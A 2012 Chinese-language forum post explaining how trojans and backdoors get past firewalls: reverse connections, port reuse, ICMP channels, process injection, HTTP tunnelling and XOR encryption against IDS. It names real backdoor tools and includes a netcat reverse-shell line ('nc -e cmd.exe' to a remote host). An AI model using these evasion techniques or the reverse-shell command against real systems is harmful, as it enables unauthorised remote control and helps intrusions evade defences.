SOGO論壇
標題:
[其他] 看木馬是如何上演穿牆術
[列印本頁]
作者:
tt2022s
時間:
2012-10-1 15:09:23
標題:
[其他] 看木馬是如何上演穿牆術
看木馬是如何上演穿牆術
1. 首先就是No Firewall (允許本地對外監聽基本上任何埠), 沒有防火牆? (這不是廢話?)
對付這種機器好辦,隨便哪個馬一般都行典型代表 Radmin (其實它不是馬, 用的人多了, 也就變成了馬,無辜)
rdp 3389/tcp (遠端桌面,它也不是馬,不過你不用,還有誰用呢?)
2. 埠篩選(只允許外部連接特定埠, 也就是外部對特定埠發起syn連接請求才被接受, 從而完成三次握手,建立連接,
否則防火牆丟棄資料包, 無法完成握手,無法建立連接, 也就是木馬不能隨意開個埠就監聽了)
道高一尺, 魔高一丈.:
你不讓我連你, 我就讓你連我喽! 反彈埠技術誕生了(一般防火牆對本地發起的syn連接請求不會攔截)
使用工具netcat (下載位址:
http://www.heibai.net/download/Soft/Soft_5972.htm
) 就可以穿刺這種防火牆 :
nc -e cmd.exe 遠程ip 遠程監聽port
隨後, 埠複用技術也出現了, 埠複用防火牆開放的埠: 如80, 21,445等
典型的後門如hkdoor, ntrookit (作者都是國人yyt_hac )
還有利用無埠協議來通信, 如利用icmp報文, (Ping就是利用的ICMP協議的 Echo Request和Echo Reply探測主機存活)
典型的如pingdoor (Ping由於使用icmp報文, 根本不開放埠, 埠篩選也就無可奈何了, 但是icmp並無差錯控制, 所以這種
後門的傳輸特性也並不理想, 除非自己加上差錯控制)
更牛的, 就是乾脆拋開TCP/IP協定,木馬自訂協定進行通信, 你防火牆能把我怎麼樣? 哈哈
典型的如ntrootkit採用了自訂協議技術.
3. 應用程式篩選.(只允許特定程式訪問網路)
木馬也不甘落後,自己不能訪問網路,只好寄人籬下:
進程插入技術誕生了,通常firewall都要允許iexplore.exe,explore.exe,svchost.exe,services.exe等程式訪問網路,
於是木馬便盯上了這些程式.插入...插入再插入
現在的遠端控制一般都是插入進程式,一是隱蔽(沒有自己進程), 二是穿牆. 典型如Bits.dll(替換系統服務BITS,插入
svchost.exe中) 和灰鴿子/PcShare(默認插入iexplorer.exe流覽器進程)等.
4. 協議篩選.
(例如,只允許80埠通過http協議,這樣那些埠複用的後門沒有使用http協議,不幸被防火牆拒之門外.:-)
怎麼辦? 暗渡陳倉, 挖隧道: http-tunnel (http隧道)將木馬通信封裝成http資料包進行傳輸.
使用這種技術的有pcshare(使用雙向http隧道傳輸)
5. IP過濾,一般就是化分為本機, 局域網,廣域網路三個層次, 不過木馬也不是吃素的, 有些木馬已經開始智慧化了:
比如, 無法連到駭客主機或者跳板,就搜索本機的代理設置, 如IE代理設置, 然後代理出去!
可以想像P2P形式的馬也將於不久以後成為可能, 這樣木馬和僵屍網路的區別就更小了 呵呵
6. 現在很多防火牆都可以檢測傳輸的敏感資訊,如使用者口令等, 所以抗IDS, 抗自動分析, 這便成了高級木馬需要考慮的東西,換句話說保護駭客控制的安全性和隱秘性. 典型的解決方法就是採取加密措施,如最簡單的對付IDS檢測的方法, xor異或加密.
但是現在的防護牆肯定不是以上技術的分離, 而是一定有多項技術同時採用.
作者:
bulbasaur
時間:
2012-10-10 01:42:36
受教了,感謝詳細描述.
作者:
lin160565
時間:
2012-10-16 22:21:14
3QQQQQQQQQ
ths
感謝分享
歡迎光臨 SOGO論壇 (https://oursogo.com/)
Powered by OURSOGO.COM